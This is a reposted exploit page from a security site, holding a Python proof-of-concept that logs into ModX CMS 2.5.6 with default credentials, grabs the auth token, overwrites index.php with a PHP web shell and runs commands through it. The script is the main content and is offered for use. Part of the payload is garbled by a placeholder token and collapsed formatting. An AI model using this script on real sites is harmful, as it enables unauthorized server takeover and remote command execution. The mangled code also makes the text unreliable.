首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ModX CMS Proof Of Concept Shell Upload
来源:code610 blogspot com 作者:Sixteen 发布时间:2017-06-01  
c@kali:~/src/Napalm2.2/libs$ cat shell-modxcms.py
#!/usr/bin/env python
# shell-modxcms.py - upload shell for modx 2.5.6-pl
#     
# !! we need rwx in modx-webdir to go ;Z
#
# 30.05.217 @ code610 blogspot com
# 

import requests
import re

target=raw_input("Hostname> ")

print '[+] Preparing tests for ' + str(target)

session = requests.session()
sesslink = target + '/manager/'

print '[+] Preparing login request...'

data_login = {
        'login_context':'mgr',
        'modahsh':'',
        'returnUrl':'/manager/',
        'username':'user',
        'password':'bitnami',
        'login':'1'
}
data_link = sesslink
doLogin = session.post(data_link, data=data_login)
loginResp = doLogin.text

if 'Logout' in loginResp:
  print '[+] We are logged in ;]'

  # grab HTTP_MODAUTH to build params for shelluprequest
  modlink = target + '/manager/?a=media/browser'
  getmod = session.get(modlink)
  getmodresp = getmod.text

  modfind = re.compile('auth:"(.*?)"')
  modfound = re.search(modfind, loginResp)

  if modfound:
    token = modfound.group(1)

    print '[+] Found HTTP_MODAUTH token:', token

    # preparing shellup req
    shell_data = {
        'action':'browser/file/update',
        'HTTP_MODAUTH':token,
        'wctx':'',
        'source':'1',
        'file':'index.php',
        'content':'<?php system(
___FCKpd___0
GET["x"]);' } shheader = {'modAuth':token} shellreq = target + '/connectors/index.php' shellup = session.post(shellreq, data=shell_data, headers=shheader) shresp = shellup.text print '[+] Shell should be ready now. Verifying:' shellme = target + '/index.php?x=id;uname -a;pwd' shverif = requests.get(shellme) print shverif.text print '' c@kali:~/src/Napalm2.2/libs$

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IBM Informix Dynamic Server /
·WebKit Document::prepareForDes
·TerraMaster F2-420 NAS TOS 3.0
·WebKit JSC JSObject::ensureLen
·KEMP LoadMaster 7.135.0.13245
·WebKit JSC emitPutDerivedConst
·Microsoft MsMpEng - Remotely E
·WebKit CachedFrame Universal C
·TiEmu 2.08 - Local Buffer Over
·WebKit Element::setAttributeNo
·uc-http Daemon - Local File In
·WebKit CachedFrameBase::restor
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved